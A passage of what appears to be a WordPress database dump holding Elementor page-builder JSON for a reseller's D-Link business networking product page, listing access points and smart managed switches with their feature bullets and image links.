Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Enjoy High-performance Wireless Connectivity<\\/p><p>\\u2013 Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><p>MU-MIMO with Beamforming<\\/p><p>\\u2013 Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><p>Multiple Operational Modes<\\/p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>\\u2022 Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>\\u2022 Gigabit Ethernet port with 802.3af Power over Ethernet<\\/p><p>\\u2022 Multiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>\\u2022 Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>\\u2022 Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>\\u2022 Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7262,3366,'_elementor_version','2.5.14'),(7263,3366,'_elementor_edit_mode','builder'),(7266,3367,'_wp_page_template','template-fullwidth.php'),(7267,3367,'_elementor_template_type','post'),(7268,3367,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":49},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"149\",\"right\":\"149\",\"bottom\":\"149\",\"left\":\"149\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"50\",\"bottom\":\"50\",\"left\":\"50\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"80\",\"bottom\":\"80\",\"left\":\"80\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":19},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"full\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Enjoy High-performance Wireless Connectivity<\\/p><p>\\u2013 Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><p>MU-MIMO with Beamforming<\\/p><p>\\u2013 Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><p>Multiple Operational Modes<\\/p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>\\u2022 Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>\\u2022 Gigabit Ethernet port with 802.3af Power over Ethernet<\\/p><p>\\u2022 Multiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf 